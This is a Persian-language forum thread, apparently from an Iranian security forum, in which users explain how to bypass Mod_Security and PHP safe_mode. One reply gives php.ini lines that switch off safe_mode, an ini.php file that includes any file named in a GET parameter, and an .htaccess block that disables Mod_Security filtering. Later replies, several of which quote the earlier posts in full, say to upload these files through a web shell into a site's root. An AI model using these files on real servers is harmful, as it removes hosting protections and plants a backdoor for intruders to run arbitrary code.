رفتن به مطلب

دور زدن Mod_Security

faryad_delaram
 اشتراک گذاری

ارسال های توصیه شده

faryad_delaram Newbie

 faryad_delaram

ارسال شده در
ارسال شده در

سلام به همه دوستان عزیز

 

هر کسی در مورد Mod_Security هر چی میدونه و در مورد چگونه دور زدن Mod_Security اطلاعات داره روی این پست بزاره ممنونم

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر
k.shadow Newbie

 k.shadow

ارسال شده در
ارسال شده در

درود

تا جایی که من اطلاع دارم بایپس مد امنیتی همون بایپس  safemode  هست

که روش های گونا گونی هم داره (با توجه به ورژن php )

مثلا 1:

از طریق php.ini

یک فایل با این نام بسازید و داخلش این کد رو بزارید :

safe_mode = Off

یا

-

short_open_tag = On
log_errors = On
log_errors_max_len = 1024
ignore_repeated_errors = On
register_globals = Off
magic_quotes_runtime = Off
magic_quotes_gpc = On
allow_url_fopen = on
AddHandler application/x-httpd-php4 .php
display_errors = Off
disable_functions = by J.ALL_EdiT0r
safe_mode = Off

 از ini.php:

یک فایل با این نام بسازید و داخلش اینو بنویسید

 <?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>

و htaccess.

یک فایل با این نام بسازید و داخلش اینو بنویسید


<Files *.php> 
ForceType application/x-httpd-php4 
</Files> 
ahm tas: <ifModule mod_security.c> 
    SecFilterEngine Off 
    SecFilterScanPOST Off 
</IfModule>

برای php 5

htaccess فکر نکنم جواب بده بهترین روش دوتای باالا هست

و اگر نشد دیگه برید سراغ سیمیلینک

این کد ها که براتون قرار دادم اکثر محدودیت های دیگه مثل display function رو نیز خاموش میکنه :)

پیروز باشید.....

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر
faryad_delaram Newbie

 faryad_delaram

ارسال شده در
  • مالک
ارسال شده در

درود

تا جایی که من اطلاع دارم بایپس مد امنیتی همون بایپس  safemode  هست

که روش های گونا گونی هم داره (با توجه به ورژن php )

مثلا 1:

از طریق php.ini

یک فایل با این نام بسازید و داخلش این کد رو بزارید :

safe_mode = Off

یا

-

short_open_tag = On
log_errors = On
log_errors_max_len = 1024
ignore_repeated_errors = On
register_globals = Off
magic_quotes_runtime = Off
magic_quotes_gpc = On
allow_url_fopen = on
AddHandler application/x-httpd-php4 .php
display_errors = Off
disable_functions = by J.ALL_EdiT0r
safe_mode = Off

 از ini.php:

یک فایل با این نام بسازید و داخلش اینو بنویسید

 <?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["file"]);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
?>

و htaccess.

یک فایل با این نام بسازید و داخلش اینو بنویسید


<Files *.php> 
ForceType application/x-httpd-php4 
</Files> 
ahm tas: <ifModule mod_security.c> 
    SecFilterEngine Off 
    SecFilterScanPOST Off 
</IfModule>

برای php 5

htaccess فکر نکنم جواب بده بهترین روش دوتای باالا هست

و اگر نشد دیگه برید سراغ سیمیلینک

این کد ها که براتون قرار دادم اکثر محدودیت های دیگه مثل display function رو نیز خاموش میکنه :)

پیروز باشید.....

اول اینکه از این دوست عزیز که واقعا پیگیر مسائل هستند و از اعضائ فعال هستند تشکر میکنم ولی قرار شد اطلاعات کامل باشه و چه بهتر اینکه یک نمونه هم داشته باشیم حالا وقتشه دوست خوبمون توضیح بده این فایلها رو بعد از ساختن چکار کنیم من که فکر نمیکنم اگه توی فلش مموری نگهداریم کار کنه :D :D :D

یه جور توضیح بده آماتورهایی مثل من هم بفهمند - خیلی لطف داری ;)

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر
deamon Newbie

 deamon

ارسال شده در
ارسال شده در

اول اینکه از این دوست عزیز که واقعا پیگیر مسائل هستند و از اعضائ فعال هستند تشکر میکنم ولی قرار شد اطلاعات کامل باشه و چه بهتر اینکه یک نمونه هم داشته باشیم حالا وقتشه دوست خوبمون توضیح بده این فایلها رو بعد از ساختن چکار کنیم من که فکر نمیکنم اگه توی فلش مموری نگهداریم کار کنه :D :D :D

یه جور توضیح بده آماتورهایی مثل من هم بفهمند - خیلی لطف داری ;)

 

فایل های ذکر شده رو ایجاد و سیو کنید و تو دایرکتوری اصلی سایت (هاست) اپلود کنید 

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر
k.shadow Newbie

 k.shadow

ارسال شده در
ارسال شده در

اول اینکه از این دوست عزیز که واقعا پیگیر مسائل هستند و از اعضائ فعال هستند تشکر میکنم ولی قرار شد اطلاعات کامل باشه و چه بهتر اینکه یک نمونه هم داشته باشیم حالا وقتشه دوست خوبمون توضیح بده این فایلها رو بعد از ساختن چکار کنیم من که فکر نمیکنم اگه توی فلش مموری نگهداریم کار کنه :D :D :D

یه جور توضیح بده آماتورهایی مثل من هم بفهمند - خیلی لطف داری ;)

درود

ممنون از تشکرتون ;)

ببینید این فایل هارو که ایجاد کردید توسط شلر یا ... توی مسیر جاری مثلا: /home/user/site/publichtml

اپلود کنید

بعد یک دور شلرتون رو دوباره اپلود کنید و شلر قبلی رو پاک کنید (این مرحله شاید نیازی نباشه همون رفرش کنید خو به رو بعضی جا ها واقعا نیازه :rolleyes: )بعدخواهید دید safemode خاموش شده

رو اکثریت سرور ها و با php های ورژن مختلف جواب میده ولی صد درصد نیست :)

عذر خواهی میکنم اگر بد توضیح دادم

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری
 اشتراک گذاری
رفتن به فهرست موضوع ها

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شرکت گاردایران

پردازشگران ایمن داده ي آدلان

شماره ثبت: 9438

شبکه های اجتماعی

 

نمادها

logo.aspx?id=56084&Code=ybjZVyBlXag5cNRv logo-samandehi

×
×
  • اضافه کردن...

اطلاعات مهم

فعالیت شما در این انجمن به منزله تایید قوانین انجمن میباشد! شرایط استفاده

  می پذیرم